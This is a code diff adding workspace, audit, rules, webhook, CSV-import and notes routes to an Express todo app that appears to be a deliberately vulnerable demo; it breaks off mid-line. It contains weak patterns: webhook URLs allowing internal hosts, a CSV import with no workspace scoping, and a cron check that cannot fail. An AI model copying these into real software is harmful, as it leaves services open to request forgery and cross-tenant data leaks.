"sha512-FM9nNUYrRBAELZQT3xeZQ7fmMOBg6nWNmJKTcgsJeaLstP/UODVpGsr5OhXhhXg6f+qtJ8uiZ+PUxkDWcgIXLw==" - }, "mkdirp": { "version": "0.5.5", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.5.tgz", @@ -27134,10 +27370,9 @@ "dev": true }, "xtend": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.1.tgz", - "integrity": "sha1-pcbVMr5lbiPbgg77lDofBJmNY68=", - "dev": true + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", + "integrity": "sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==" }, "y18n": { "version": "3.2.1", diff --git a/package.json b/package.json index 03b266eb493..e43ec3f4b5e 100644 --- a/package.json +++ b/package.json @@ -19,6 +19,7 @@ "body-parser": "1.9.0", "cfenv": "^1.0.4", "consolidate": "0.14.5", + "csv-parse": "^6.1.0", "dompurify": "^3.3.0", "dustjs-helpers": "1.5.0", "dustjs-linkedin": "2.5.0", @@ -43,7 +44,9 @@ "mongoose": "6.13.6", "morgan": "latest", "ms": "^0.7.1", + "multer": "^2.0.2", "mysql": "^2.18.1", + "node-cron": "^3.0.3", "npmconf": "0.0.24", "optional": "^0.1.3", "st": "0.2.4", diff --git a/routes/api.js b/routes/api.js new file mode 100644 index 00000000000..92af612d4ba --- /dev/null +++ b/routes/api.js @@ -0,0 +1,20 @@ +/** + * Mount all /api routes: workspaces, workspace-todos, audit, webhooks, rules. + */ + +var express = require('express'); +var workspaces = require('./workspaces'); +var workspaceTodos = require('./workspace-todos'); +var audit = require('./audit'); +var webhooks = require('./webhooks'); +var rules = require('./rules'); + +var router = express.Router(); + +router.use('/workspaces', workspaces); +router.use('/workspaces', workspaceTodos); +router.use('/workspaces', audit); +router.use('/workspaces', webhooks); +router.use('/workspaces', rules); + +module.exports = router; diff --git a/routes/audit.js b/routes/audit.js new file mode 100644 index 00000000000..b771d6ccd48 --- /dev/null +++ b/routes/audit.js @@ -0,0 +1,100 @@ +/** + * REST API: Audit log for a workspace. + * GET /api/workspaces/:workspaceId/audit + */ + +var mongoose = require('mongoose'); +var express = require('express'); +var router = express.Router(); +var { param, query, validationResult } = require('express-validator'); +var AuditEvent = mongoose.model('AuditEvent'); +var apiAuth = require('../middleware/api-auth'); +var workspaceAuth = require('../services/workspace-auth'); + +var DEFAULT_PAGE = 1; +var DEFAULT_LIMIT = 50; +var MAX_LIMIT = 100; + +function handleValidation(req, res) { + var errors = validationResult(req); + if (!errors.isEmpty()) { + return res.status(400).json({ error: 'Validation failed', details: errors.array() }); + } + return null; +} + +router.use(apiAuth.setApiUser); +router.use(apiAuth.requireApiUser); + +router.param('workspaceId', function (req, res, next, id) { + if (!mongoose.Types.ObjectId.isValid(id)) { + return res.status(400).json({ error: 'Invalid workspace ID' }); + } + req.workspaceIdParam = id; + next(); +}); + +router.use('/:workspaceId/audit', workspaceAuth.requireMember); +router.use('/:workspaceId/audit', function (req, res, next) { + req.workspaceId = req.workspaceIdParam || req.params.workspaceId; + next(); +}); + +router.get( + '/:workspaceId/audit', + [ + query('action').optional().trim().isLength({ max: 100 }), + query('resourceType').optional().isIn(['todo', 'workspace', 'member']), + query('actor').optional().trim().isLength({ max: 200 }), + query('from').optional().isISO8601(), + query('to').optional().isISO8601(), + query('page').optional().isInt({ min: 1 }).toInt(), + query('limit').optional().isInt({ min: 1, max: MAX_LIMIT }).toInt(), + ], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var workspaceId = req.workspaceId; + var page = Math.max(1, parseInt(req.query.page, 10) || DEFAULT_PAGE); + var limit = Math.min(MAX_LIMIT, parseInt(req.query.limit, 10) || DEFAULT_LIMIT); + var workspaceObjId = new mongoose.Types.ObjectId(workspaceId); + var q = { workspace: workspaceObjId }; + if (typeof req.query.action === 'string' && req.query.action.trim()) q.action = req.query.action.trim(); + if (typeof req.query.resourceType === 'string' && ['todo', 'workspace', 'member'].indexOf(req.query.resourceType) !== -1) q.resourceType = req.query.resourceType; + if (typeof req.query.actor === 'string' && req.query.actor.trim()) q.actor = req.query.actor.trim(); + if (req.query.from || req.query.to) { + q.createdAt = {}; + if (req.query.from) q.createdAt.$gte = new Date(req.query.from); + if (req.query.to) q.createdAt.$lte = new Date(req.query.to); + } + AuditEvent.countDocuments(q).exec(function (err, total) { + if (err) return next(err); + AuditEvent.find(q) + .sort({ createdAt: -1 }) + .skip((page - 1) * limit) + .limit(limit) + .lean() + .exec(function (err2, events) { + if (err2) return next(err2); + res.json({ + events: (events || []).map(function (e) { + return { + id: e._id, + workspace: e.workspace, + actor: e.actor, + action: e.action, + resourceType: e.resourceType, + resourceId: e.resourceId, + details: e.details, + ip: e.ip, + createdAt: e.createdAt, + }; + }), + meta: { total: total, page: page, limit: limit }, + }); + }); + }); + } +); + +module.exports = router; diff --git a/routes/index.js b/routes/index.js index 6b5455f03e4..40f9c38a15c 100644 --- a/routes/index.js +++ b/routes/index.js @@ -2,6 +2,11 @@ var utils = require('../utils'); var mongoose = require('mongoose'); var Todo = mongoose.model('Todo'); var User = mongoose.model('User'); +var Note = mongoose.model('Note'); +var marked = require('marked'); +var createDOMPurify = require('dompurify'); +var { JSDOM } = require('jsdom'); +var DOMPurify = createDOMPurify(new JSDOM('').window); // TODO: var hms = require('humanize-ms'); var ms = require('ms'); @@ -305,6 +310,45 @@ exports.about_new = function (req, res, next) { }); }; +// Notes CRUD + +exports.createNote = function (req, res, next) { + var title = req.body.title; + var content = req.body.content; + + if (!title || !content) { + return res.status(400).json({ error: 'Title and content are required' }); + } + + new Note({ + title: validator.escape(title), + content: content, + created_at: Date.now(), + updated_at: Date.now(), + }).save(function (err, note) { + if (err) return next(err); + res.status(201).json({ id: note._id, title: note.title }); + }); +}; + +exports.getNote = function (req, res, next) { + if (!mongoose.Types.ObjectId.isValid(req.params.id)) { + return res.status(400).send('Invalid note ID'); + } + + Note.findById(req.params.id, function (err, note) { + if (err) return next(err); + if (!note) return res.status(404).send('Note not found'); + + var renderedContent = DOMPurify.sanitize(marked(note.content)); + + res.send( + '

' + note.title + '

' + + '
' + renderedContent + '
' + ); + }); +}; + // Prototype Pollution /////////////////////////////////////////////////////////////////////////////// diff --git a/routes/rules.js b/routes/rules.js new file mode 100644 index 00000000000..b0664db2d45 --- /dev/null +++ b/routes/rules.js @@ -0,0 +1,213 @@ +/** + * REST API: Automation rules for a workspace. + * POST/GET/PATCH/DELETE /api/workspaces/:workspaceId/rules + */ + +var mongoose = require('mongoose'); +var express = require('express'); +var router = express.Router(); +var { body, param, validationResult } = require('express-validator'); +var Rule = mongoose.model('Rule'); +var apiAuth = require('../middleware/api-auth'); +var workspaceAuth = require('../services/workspace-auth'); +var ruleEngine = require('../services/rule-engine'); + +var TRIGGERS = ['schedule', 'todo.created', 'todo.updated']; +var MAX_RULES = ruleEngine.MAX_RULES_PER_WORKSPACE; +var MAX_ACTIONS = ruleEngine.MAX_ACTIONS_PER_RULE; + +function handleValidation(req, res) { + var errors = validationResult(req); + if (!errors.isEmpty()) { + return res.status(400).json({ error: 'Validation failed', details: errors.array() }); + } + return null; +} + +function validateConditions(conditions) { + if (!Array.isArray(conditions)) return 'conditions must be an array'; + var maxConditions = 20; + if (conditions.length > maxConditions) return 'Too many conditions (max ' + maxConditions + ')'; + for (var i = 0; i < conditions.length; i++) { + var c = conditions[i]; + if (!c || typeof c !== 'object' || typeof c.field !== 'string' || !c.op) return 'Each condition must have field and op'; + if (['eq', 'neq', 'in', 'contains', 'before', 'after'].indexOf(c.op) === -1) { + return 'Invalid op: ' + c.op; + } + } + return null; +} + +function validateActions(actions) { + if (!Array.isArray(actions)) return 'actions must be an array'; + if (actions.length > MAX_ACTIONS) return 'At most ' + MAX_ACTIONS + ' actions per rule'; + for (var i = 0; i < actions.length; i++) { + var a = actions[i]; + if (!a || !a.type) return 'Each action must have type'; + if (a.type === 'send_webhook' && !a.url) return 'send_webhook action requires url'; + if (a.type === 'update_todos' && !a.updates) return 'update_todos action requires updates object'; + } + return null; +} + +router.use(apiAuth.setApiUser); +router.use(apiAuth.requireApiUser); + +router.param('workspaceId', function (req, res, next, id) { + if (!mongoose.Types.ObjectId.isValid(id)) { + return res.status(400).json({ error: 'Invalid workspace ID' }); + } + req.workspaceIdParam = id; + next(); +}); + +router.use('/:workspaceId/rules', workspaceAuth.requireMember); +router.use('/:workspaceId/rules', workspaceAuth.requireAdminRole); +router.use('/:workspaceId/rules', function (req, res, next) { + req.workspaceId = req.workspaceIdParam || req.params.workspaceId; + next(); +}); + +router.post( + '/:workspaceId/rules', + [ + body('name').notEmpty().withMessage('name is required').trim().isLength({ max: 200 }), + body('enabled').optional().isBoolean(), + body('trigger').isIn(TRIGGERS).withMessage('trigger must be schedule, todo.created, or todo.updated'), + body('schedule').optional().trim(), + body('conditions').optional().isArray(), + body('actions').optional().isArray(), + ], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var workspaceId = req.workspaceId; + var condErr = validateConditions(req.body.conditions || []); + if (condErr) return res.status(400).json({ error: condErr }); + var actErr = validateActions(req.body.actions || []); + if (actErr) return res.status(400).json({ error: actErr }); + if (req.body.trigger === 'schedule' && !(req.body.schedule && req.body.schedule.trim())) { + return res.status(400).json({ error: 'schedule (cron expression) is required when trigger is schedule' }); + } + if (req.body.trigger === 'schedule') { + try { + require('node-cron').validate(req.body.schedule); + } catch (e) { + return res.status(400).json({ error: 'Invalid cron expression: ' + e.message }); + } + } + var workspaceObjId = new mongoose.Types.ObjectId(workspaceId); + Rule.countDocuments({ workspace: workspaceObjId }).exec(function (err, count) { + if (err) return next(err); + if (count >= MAX_RULES) { + return res.status(400).json({ error: 'Maximum ' + MAX_RULES + ' rules per workspace' }); + } + var rule = new Rule({ + workspace: workspaceObjId, + name: req.body.name.trim(), + enabled: req.body.enabled !== false, + trigger: req.body.trigger, + schedule: (req.body.schedule && req.body.schedule.trim()) || null, + conditions: req.body.conditions || [], + actions: req.body.actions || [], + }); + rule.save(function (err2, saved) { + if (err2) return next(err2); + res.status(201).json(ruleToJson(saved)); + }); + }); + } +); + +router.get('/:workspaceId/rules', function (req, res, next) { + var workspaceId = req.workspaceId; + Rule.find({ workspace: workspaceId }).lean().exec(function (err, rules) { + if (err) return next(err); + res.json({ rules: (rules || []).map(ruleToJson) }); + }); +}); + +function ruleToJson(r) { + return { + id: r._id, + name: r.name, + enabled: r.enabled, + trigger: r.trigger, + schedule: r.schedule, + conditions: r.conditions, + actions: r.actions, + }; +} + +router.get( + '/:workspaceId/rules/:id', + [param('id').isMongoId()], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var workspaceId = req.workspaceId; + var id = req.params.id; + var idObj = new mongoose.Types.ObjectId(id); + var workspaceObjId = new mongoose.Types.ObjectId(workspaceId); + Rule.findOne({ _id: idObj, workspace: workspaceObjId }).lean().exec(function (err, rule) { + if (err) return next(err); + if (!rule) return res.status(404).json({ error: 'Rule not found' }); + res.json(ruleToJson(rule)); + }); + } +); + +router.patch( + '/:workspaceId/rules/:id', + [ + param('id').isMongoId(), + body('name').optional().trim().isLength({ max: 200 }), + body('enabled').optional().isBoolean(), + body('schedule').optional().trim(), + body('conditions').optional().isArray(), + body('actions').optional().isArray(), + ], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var condErr = req.body.conditions !== undefined ? validateConditions(req.body.conditions) : null; + if (condErr) return res.status(400).json({ error: condErr }); + var actErr = req.body.actions !== undefined ? validateActions(req.body.actions) : null; + if (actErr) return res.status(400).json({ error: actErr }); + var workspaceId = req.workspaceId; + var id = req.params.id; + Rule.findOne({ _id: id, workspace: workspaceId }).exec(function (err, rule) { + if (err) return next(err); + if (!rule) return res.status(404).json({ error: 'Rule not found' }); + if (req.body.name !== undefined) rule.name = req.body.name.trim(); + if (req.body.enabled !== undefined) rule.enabled = req.body.enabled; + if (req.body.schedule !== undefined) rule.schedule = req.body.schedule && req.body.schedule.trim() ? req.body.schedule.trim() : null; + if (req.body.conditions !== undefined) rule.conditions = req.body.conditions; + if (req.body.actions !== undefined) rule.actions = req.body.actions; + rule.save(function (err2, updated) { + if (err2) return next(err2); + res.json(ruleToJson(updated)); + }); + }); + } +); + +router.delete( + '/:workspaceId/rules/:id', + [param('id').isMongoId()], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var workspaceId = req.workspaceId; + var id = req.params.id; + var idObj = new mongoose.Types.ObjectId(id); + var workspaceObjId = new mongoose.Types.ObjectId(workspaceId); + Rule.findOneAndDelete({ _id: idObj, workspace: workspaceObjId }).exec(function (err, removed) { + if (err) return next(err); + if (!removed) return res.status(404).json({ error: 'Rule not found' }); + res.status(204).send(); + }); + } +); + +module.exports = router; diff --git a/routes/todo-import.js b/routes/todo-import.js new file mode 100644 index 00000000000..4e36a28e750 --- /dev/null +++ b/routes/todo-import.js @@ -0,0 +1,277 @@ +var crypto = require('crypto'); +var { Readable } = require('stream'); +var { parse } = require('csv-parse'); +var multer = require('multer'); +var mongoose = require('mongoose'); +var validator = require('validator'); + +var Todo = mongoose.model('Todo'); + +var upload = multer({ + storage: multer.memoryStorage(), + limits: { fileSize: 5 * 1024 * 1024 }, + fileFilter: function (_req, file, cb) { + if (file.mimetype !== 'text/csv' && file.mimetype !== 'application/vnd.ms-excel') { + return cb(new Error('Only CSV files are allowed')); + } + cb(null, true); + }, +}); + +var jobs = new Map(); + +var JOB_TTL_MS = 5 * 60 * 1000; +var VALID_PRIORITIES = ['low', 'medium', 'high']; + +function computeContentHash(content) { + return crypto.createHash('sha256').update(content.trim().toLowerCase()).digest('hex'); +} + +function validateRow(row) { + var errors = []; + + if (!row.content || !row.content.trim()) { + errors.push('content is required'); + } + + if (row.due_date && row.due_date.trim()) { + var d = new Date(row.due_date.trim()); + if (isNaN(d.getTime())) { + errors.push('due_date must be a valid date'); + } + } + + if (row.priority && row.priority.trim()) { + if (!VALID_PRIORITIES.includes(row.priority.toLowerCase().trim())) { + errors.push('priority must be one of: low, medium, high'); + } + } + + return errors; +} + +function parseTags(tagsStr) { + if (!tagsStr || !tagsStr.trim()) return []; + return tagsStr.split(';').map(function (t) { return t.trim(); }).filter(Boolean); +} + +function buildProgressPayload(job) { + return { + jobId: job.id, + status: job.status, + totalRows: job.totalRows, + processed: job.processed, + created: job.results.filter(function (r) { return r.status === 'created'; }).length, + skippedDuplicate: job.results.filter(function (r) { return r.status === 'skipped-duplicate'; }).length, + failed: job.results.filter(function (r) { return r.status === 'failed'; }).length, + }; +} + +function emitProgress(job) { + var data = buildProgressPayload(job); + job.listeners.forEach(function (listener) { + try { + listener(data); + } catch (_e) { + job.listeners.delete(listener); + } + }); +} + +function parseCsvBuffer(buffer) { + return new Promise(function (resolve, reject) { + var rows = []; + var readable = Readable.from(buffer.toString('utf-8')); + var parser = readable.pipe(parse({ + columns: true, + skip_empty_lines: true, + trim: true, + relax_column_count: true, + })); + + parser.on('data', function (row) { rows.push(row); }); + parser.on('error', reject); + parser.on('end', function () { resolve(rows); }); + }); +} + +exports.uploadMiddleware = upload.single('file'); + +exports.importCsv = async function (req, res) { + if (!req.file) { + return res.status(400).json({ error: 'No CSV file uploaded. Use field name "file".' }); + } + + var jobId = crypto.randomUUID(); + var job = { + id: jobId, + status: 'processing', + totalRows: 0, + processed: 0, + results: [], + listeners: new Set(), + }; + jobs.set(jobId, job); + + try { + var rows = await parseCsvBuffer(req.file.buffer); + + job.totalRows = rows.length; + emitProgress(job); + + var csvHashes = rows + .filter(function (r) { return r.content && r.content.trim(); }) + .map(function (r) { return computeContentHash(r.content); }); + + var existingTodos = await Todo.find({ + content_hash: { $in: csvHashes }, + }).select('content_hash').lean(); + + var existingHashes = new Set( + existingTodos + .filter(function (t) { return t.content_hash; }) + .map(function (t) { return t.content_hash; }) + ); + + var session = await mongoose.startSession(); + + try { + await session.withTransaction(async function () { + var seenInBatch = new Set(); + + for (var i = 0; i < rows.length; i++) { + var row = rows[i]; + var rowResult = { row: i + 1, content: (row.content || '').substring(0, 200) }; + + var errors = validateRow(row); + if (errors.length > 0) { + rowResult.status = 'failed'; + rowResult.reason = errors.join('; '); + job.results.push(rowResult); + job.processed++; + emitProgress(job); + continue; + } + + var hash = computeContentHash(row.content); + if (existingHashes.has(hash) || seenInBatch.has(hash)) { + rowResult.status = 'skipped-duplicate'; + job.results.push(rowResult); + job.processed++; + emitProgress(job); + continue; + } + + var dueDate = row.due_date && row.due_date.trim() ? new Date(row.due_date.trim()) : undefined; + var priority = row.priority ? row.priority.toLowerCase().trim() : undefined; + var tags = parseTags(row.tags); + + try { + await Todo.findOneAndUpdate( + { content_hash: hash }, + { + $setOnInsert: { + content: Buffer.from(row.content.trim()), + content_hash: hash, + due_date: dueDate, + priority: priority, + tags: tags, + updated_at: new Date(), + }, + }, + { upsert: true, new: true, session: session } + ); + + seenInBatch.add(hash); + rowResult.status = 'created'; + } catch (upsertErr) { + rowResult.status = 'failed'; + rowResult.reason = upsertErr.message; + } + + job.results.push(rowResult); + job.processed++; + emitProgress(job); + } + }); + } finally { + await session.endSession(); + } + + job.status = 'completed'; + emitProgress(job); + + setTimeout(function () { jobs.delete(jobId); }, JOB_TTL_MS); + + return res.status(200).json({ + jobId: jobId, + status: 'completed', + totalRows: job.totalRows, + created: job.results.filter(function (r) { return r.status === 'created'; }).length, + skippedDuplicate: job.results.filter(function (r) { return r.status === 'skipped-duplicate'; }).length, + failed: job.results.filter(function (r) { return r.status === 'failed'; }).length, + rows: job.results, + }); + + } catch (err) { + job.status = 'failed'; + job.error = err.message; + emitProgress(job); + + setTimeout(function () { jobs.delete(jobId); }, JOB_TTL_MS); + + return res.status(500).json({ + jobId: jobId, + error: 'Import failed', + details: err.message, + }); + } +}; + +exports.importStatus = function (req, res) { + var jobId = req.params.jobId; + + if (!validator.isUUID(jobId)) { + return res.status(400).json({ error: 'Invalid job ID format' }); + } + + var job = jobs.get(jobId); + if (!job) { + return res.status(404).json({ error: 'Job not found' }); + } + + res.writeHead(200, { + 'Content-Type': 'text/event-stream', + 'Cache-Control': 'no-cache', + 'Connection': 'keep-alive', + 'X-Accel-Buffering': 'no', + }); + res.write('\n'); + + var currentData = buildProgressPayload(job); + res.write('data: ' + JSON.stringify(currentData) + '\n\n'); + + if (job.status === 'completed' || job.status === 'failed') { + res.write('event: done\ndata: ' + JSON.stringify(currentData) + '\n\n'); + return res.end(); + } + + var listener = function (progressData) { + try { + res.write('data: ' + JSON.stringify(progressData) + '\n\n'); + if (progressData.status === 'completed' || progressData.status === 'failed') { + res.write('event: done\ndata: ' + JSON.stringify(progressData) + '\n\n'); + job.listeners.delete(listener); + res.end(); + } + } catch (_e) { + job.listeners.delete(listener); + } + }; + + job.listeners.add(listener); + + req.on('close', function () { + job.listeners.delete(listener); + }); +}; diff --git a/routes/webhooks.js b/routes/webhooks.js new file mode 100644 index 00000000000..4ec6b1ef417 --- /dev/null +++ b/routes/webhooks.js @@ -0,0 +1,122 @@ +/** + * REST API: Webhooks for a workspace. + * POST /api/workspaces/:workspaceId/webhooks, GET /api/workspaces/:workspaceId/webhooks, DELETE /api/workspaces/:workspaceId/webhooks/:id + */ + +var mongoose = require('mongoose'); +var express = require('express'); +var router = express.Router(); +var crypto = require('crypto'); +var { body, param, validationResult } = require('express-validator'); +var Webhook = mongoose.model('Webhook'); +var apiAuth = require('../middleware/api-auth'); +var workspaceAuth = require('../services/workspace-auth'); + +var EVENT_NAMES = ['todo.created', 'todo.updated', 'todo.deleted', 'workspace.updated', 'member.added']; + +function handleValidation(req, res) { + var errors = validationResult(req); + if (!errors.isEmpty()) { + return res.status(400).json({ error: 'Validation failed', details: errors.array() }); + } + return null; +} + +router.use(apiAuth.setApiUser); +router.use(apiAuth.requireApiUser); + +router.param('workspaceId', function (req, res, next, id) { + if (!mongoose.Types.ObjectId.isValid(id)) { + return res.status(400).json({ error: 'Invalid workspace ID' }); + } + req.workspaceIdParam = id; + next(); +}); + +router.use('/:workspaceId/webhooks', workspaceAuth.requireMember); +router.use('/:workspaceId/webhooks', workspaceAuth.requireAdminRole); +router.use('/:workspaceId/webhooks', function (req, res, next) { + req.workspaceId = req.workspaceIdParam || req.params.workspaceId; + next(); +}); + +router.post( + '/:workspaceId/webhooks', + [ + body('url').notEmpty().withMessage('url is required').trim().isURL({ require_tld: false }), + body('secret').optional().trim(), + body('events').optional().isArray(), + body('events.*').optional().isIn(EVENT_NAMES), + body('active').optional().isBoolean(), + ], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var workspaceId = req.workspaceId; + var url = req.body.url.trim(); + var secret = req.body.secret && req.body.secret.trim() ? req.body.secret.trim() : crypto.randomBytes(24).toString('hex'); + var events = Array.isArray(req.body.events) ? req.body.events : EVENT_NAMES.slice(); + events = events.filter(function (e) { return EVENT_NAMES.indexOf(e) !== -1; }); + if (events.length === 0) events = EVENT_NAMES.slice(); + var active = req.body.active !== false; + var webhook = new Webhook({ + workspace: workspaceId, + url: url, + secret: secret, + events: events, + active: active, + }); + webhook.save(function (err, saved) { + if (err) return next(err); + res.status(201).json({ + id: saved._id, + url: saved.url, + events: saved.events, + active: saved.active, + createdAt: saved.createdAt, + }); + }); + } +); + +router.get('/:workspaceId/webhooks', function (req, res, next) { + var workspaceId = req.workspaceId; + Webhook.find({ workspace: workspaceId }) + .select('-secret') + .lean() + .exec(function (err, webhooks) { + if (err) return next(err); + res.json({ + webhooks: (webhooks || []).map(function (w) { + return { + id: w._id, + url: w.url, + events: w.events, + active: w.active, + createdAt: w.createdAt, + lastFailure: w.lastFailure, + }; + }), + }); + }); +}); + +router.delete( + '/:workspaceId/webhooks/:id', + [param('id').isMongoId()], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var workspaceId = req.workspaceId; + var id = req.params.id; + var idObj = new mongoose.Types.ObjectId(id); + var workspaceObjId = new mongoose.Types.ObjectId(workspaceId); + Webhook.findOneAndDelete({ _id: idObj, workspace: workspaceObjId }).exec(function (err, removed) { + if (err) return next(err); + if (!removed) return res.status(404).json({ error: 'Webhook not found' }); + res.status(204).send(); + }); + } +); + +module.exports = router; diff --git a/routes/workspace-todos.js b/routes/workspace-todos.js new file mode 100644 index 00000000000..3c2c5877f85 --- /dev/null +++ b/routes/workspace-todos.js @@ -0,0 +1,300 @@ +/** + * REST API: Workspace-scoped Todos. + * GET/POST /api/workspaces/:workspaceId/todos, GET/PATCH/DELETE /api/workspaces/:workspaceId/todos/:id + */ + +var mongoose = require('mongoose'); +var express = require('express'); +var router = express.Router(); +var { body, param, query, validationResult } = require('express-validator'); +var Todo = mongoose.model('Todo'); +var apiAuth = require('../middleware/api-auth'); +var workspaceAuth = require('../services/workspace-auth'); +var auditService = require('../services/audit'); +var webhookDelivery = require('../services/webhook-delivery'); +var ruleEngine = require('../services/rule-engine'); + +var VALID_PRIORITIES = ['low', 'medium', 'high']; +var DEFAULT_PAGE = 1; +var DEFAULT_LIMIT = 20; +var MAX_LIMIT = 100; + +function handleValidation(req, res) { + var errors = validationResult(req); + if (!errors.isEmpty()) { + return res.status(400).json({ error: 'Validation failed', details: errors.array() }); + } + return null; +} + +function todoToJson(todo) { + var content = todo.content; + var contentStr = Buffer.isBuffer(content) ? content.toString('utf8') : (content || ''); + return { + id: todo._id, + content: contentStr, + due_date: todo.due_date, + priority: todo.priority, + tags: todo.tags || [], + updated_at: todo.updated_at, + workspace: todo.workspace, + }; +} + +router.use(apiAuth.setApiUser); +router.use(apiAuth.requireApiUser); + +router.param('workspaceId', function (req, res, next, id) { + if (!mongoose.Types.ObjectId.isValid(id)) { + return res.status(400).json({ error: 'Invalid workspace ID' }); + } + req.workspaceIdParam = id; + next(); +}); + +router.use('/:workspaceId', workspaceAuth.requireMember); +router.use('/:workspaceId', function (req, res, next) { + req.workspaceId = req.workspaceIdParam || req.params.workspaceId; + next(); +}); + +router.get( + '/:workspaceId/todos', + [ + query('page').optional().isInt({ min: 1 }).toInt(), + query('limit').optional().isInt({ min: 1, max: MAX_LIMIT }).toInt(), + query('sort').optional().matches(/^-?(updated_at|due_date|priority)$/), + query('priority').optional().isIn(VALID_PRIORITIES), + query('tags').optional().trim(), + query('dueBefore').optional().isISO8601(), + query('dueAfter').optional().isISO8601(), + query('search').optional().trim().isLength({ max: 500 }), + ], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var workspaceId = req.workspaceId; + var membership = req.workspaceMembership; + if (membership.role === 'viewer') { + } + var page = Math.max(1, parseInt(req.query.page, 10) || DEFAULT_PAGE); + var limit = Math.min(MAX_LIMIT, parseInt(req.query.limit, 10) || DEFAULT_LIMIT); + var sortStr = (typeof req.query.sort === 'string' && /^-?(updated_at|due_date|priority)$/.test(req.query.sort.trim())) ? req.query.sort.trim() : '-updated_at'; + var sortObj = {}; + if (sortStr.charAt(0) === '-') { + sortObj[sortStr.slice(1)] = -1; + } else { + sortObj[sortStr] = 1; + } + var q = { workspace: workspaceId, deleted_at: null }; + if (typeof req.query.priority === 'string' && VALID_PRIORITIES.indexOf(req.query.priority) !== -1) q.priority = req.query.priority; + if (typeof req.query.tags === 'string') { + var tags = req.query.tags.split(',').map(function (t) { return String(t).trim(); }).filter(Boolean); + if (tags.length) q.tags = { $all: tags }; + } + if (req.query.dueBefore || req.query.dueAfter) { + q.due_date = q.due_date || {}; + if (req.query.dueBefore) q.due_date.$lt = new Date(req.query.dueBefore); + if (req.query.dueAfter) q.due_date.$gt = new Date(req.query.dueAfter); + } + if (typeof req.query.search === 'string' && req.query.search.trim()) { + q.content_str = new RegExp(escapeRegex(req.query.search.trim()), 'i'); + } + var workspaceObjId = new mongoose.Types.ObjectId(workspaceId); + var qSafe = Object.assign({}, q, { workspace: workspaceObjId }); + Todo.countDocuments(qSafe).exec(function (err, total) { + if (err) return next(err); + Todo.find(qSafe) + .sort(sortObj) + .skip((page - 1) * limit) + .limit(limit) + .lean() + .exec(function (err2, todos) { + if (err2) return next(err2); + var items = (todos || []).map(function (t) { + var contentStr = Buffer.isBuffer(t.content) ? t.content.toString('utf8') : (t.content || ''); + return { + id: t._id, + content: contentStr, + due_date: t.due_date, + priority: t.priority, + tags: t.tags || [], + updated_at: t.updated_at, + workspace: t.workspace, + }; + }); + res.json({ + todos: items, + meta: { total: total, page: page, limit: limit }, + }); + }); + }); + } +); + +function escapeRegex(s) { + return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'); +} + +router.post( + '/:workspaceId/todos', + [ + body('content').notEmpty().withMessage('content is required').trim().isLength({ max: 10000 }), + body('due_date').optional({ values: 'falsy' }).isISO8601(), + body('priority').optional().isIn(VALID_PRIORITIES), + body('tags').optional(), + ], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + if (req.workspaceMembership.role === 'viewer') { + return res.status(403).json({ error: 'Viewers cannot create todos' }); + } + var workspaceId = req.workspaceId; + var content = req.body.content.trim(); + var due_date = req.body.due_date ? new Date(req.body.due_date) : undefined; + var priority = req.body.priority || undefined; + var tags = Array.isArray(req.body.tags) ? req.body.tags : (req.body.tags ? [].concat(req.body.tags) : []); + tags = tags.map(function (t) { return String(t).trim(); }).filter(Boolean); + var todo = new Todo({ + content: Buffer.from(content, 'utf8'), + content_str: content, + due_date: due_date, + priority: priority, + tags: tags, + updated_at: new Date(), + workspace: workspaceId, + }); + todo.save(function (err, saved) { + if (err) return next(err); + auditService.createEvent({ + workspace: workspaceId, + actor: req.apiUserId, + action: 'todo.created', + resourceType: 'todo', + resourceId: String(saved._id), + details: { content: content.substring(0, 200) }, + ip: req.ip, + }); + webhookDelivery.notifyWebhooks(workspaceId, 'todo.created', { + resourceId: String(saved._id), + data: todoToJson(saved), + }); + ruleEngine.runRulesForTodo(workspaceId, 'todo.created', saved, function () {}); + res.status(201).json(todoToJson(saved)); + }); + } +); + +router.get( + '/:workspaceId/todos/:id', + [param('id').isMongoId()], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var workspaceId = req.workspaceId; + var id = req.params.id; + var idObj = new mongoose.Types.ObjectId(id); + var workspaceObjId = new mongoose.Types.ObjectId(workspaceId); + Todo.findOne({ _id: idObj, workspace: workspaceObjId, deleted_at: null }).exec(function (err, todo) { + if (err) return next(err); + if (!todo) return res.status(404).json({ error: 'Todo not found' }); + res.json(todoToJson(todo)); + }); + } +); + +router.patch( + '/:workspaceId/todos/:id', + [ + param('id').isMongoId(), + body('content').optional().trim().isLength({ max: 10000 }), + body('due_date').optional({ values: 'falsy' }).isISO8601(), + body('priority').optional().isIn(VALID_PRIORITIES), + body('tags').optional(), + ], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + if (req.workspaceMembership.role === 'viewer') { + return res.status(403).json({ error: 'Viewers cannot update todos' }); + } + var workspaceId = req.workspaceId; + var id = req.params.id; + var idObj = new mongoose.Types.ObjectId(id); + var workspaceObjId = new mongoose.Types.ObjectId(workspaceId); + Todo.findOne({ _id: idObj, workspace: workspaceObjId, deleted_at: null }).exec(function (err, todo) { + if (err) return next(err); + if (!todo) return res.status(404).json({ error: 'Todo not found' }); + if (req.body.content !== undefined) { + todo.content = Buffer.from(req.body.content.trim(), 'utf8'); + todo.content_str = req.body.content.trim(); + } + if (req.body.due_date !== undefined) todo.due_date = req.body.due_date ? new Date(req.body.due_date) : null; + if (req.body.priority !== undefined) todo.priority = req.body.priority; + if (req.body.tags !== undefined) { + var tags = Array.isArray(req.body.tags) ? req.body.tags : [].concat(req.body.tags || []); + todo.tags = tags.map(function (t) { return 